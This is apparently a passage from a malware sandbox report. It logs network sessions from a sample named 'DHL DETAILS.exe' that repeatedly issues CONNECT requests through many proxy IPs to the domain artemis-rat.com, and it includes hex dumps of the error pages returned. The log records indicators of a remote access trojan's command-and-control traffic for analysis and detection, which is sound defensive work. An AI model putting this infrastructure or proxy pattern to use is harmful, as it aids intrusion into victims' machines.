                                                                                    Mar 9, 2024 13:14:17.724143982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.333441973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.942682981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    710192.168.2.551480148.72.212.212339056352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.126893044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.130086899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.224286079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.224140882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    711192.168.2.55222844.190.9.65481006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.128547907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    712192.168.2.552130203.218.172.22580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.160470009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    713192.168.2.55207031.28.4.192806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.162404060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.508296013 CET488INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                    Content-Length: 306
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 63 2e 70 6c 6f 6d 62 77 61 79 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 1c.plombway.ru Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    714192.168.2.5520828.130.34.23790906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.164586067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.500276089 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    715192.168.2.552370104.24.220.52806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.164798975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.320872068 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    716192.168.2.552096185.220.226.2358086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.165103912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    717192.168.2.552307167.172.159.43228476352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.166917086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    718192.168.2.55218560.246.122.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.167325974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    719192.168.2.55216343.133.70.57156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.167330980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    720192.168.2.552372162.159.242.8806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.168272018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.331460953 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    721192.168.2.552142148.72.215.79472026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.195008039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.950402021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.974111080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.974066019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.973845959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.022430897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.046118021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    722192.168.2.55223172.210.221.22341456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.195127010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    723192.168.2.55209258.20.248.13990026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.195228100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.546745062 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    724192.168.2.552369159.65.77.16885856352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.196454048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    725192.168.2.552425104.25.108.120806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.196623087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.351102114 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    726192.168.2.55206747.100.236.2380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.198610067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.942439079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.659812927 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    727192.168.2.55217334.87.84.105806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.198935032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.268563032 CET536INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 532
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 70 69 74 75 6b 40 6d 79 63 61 73 68 62 61 63 6b 2e 63 6f 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at pituk@mycashback.co to inform them of the time this e
                                                                                    Mar 9, 2024 13:14:16.268625021 CET172INData Raw: 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20
                                                                                    Data Ascii: rror occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    728192.168.2.552447104.16.207.86806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.199600935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.353852034 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    729192.168.2.552440162.159.243.178806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.201817989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.365663052 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    730192.168.2.551450216.137.184.253806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.201915026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.248760939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
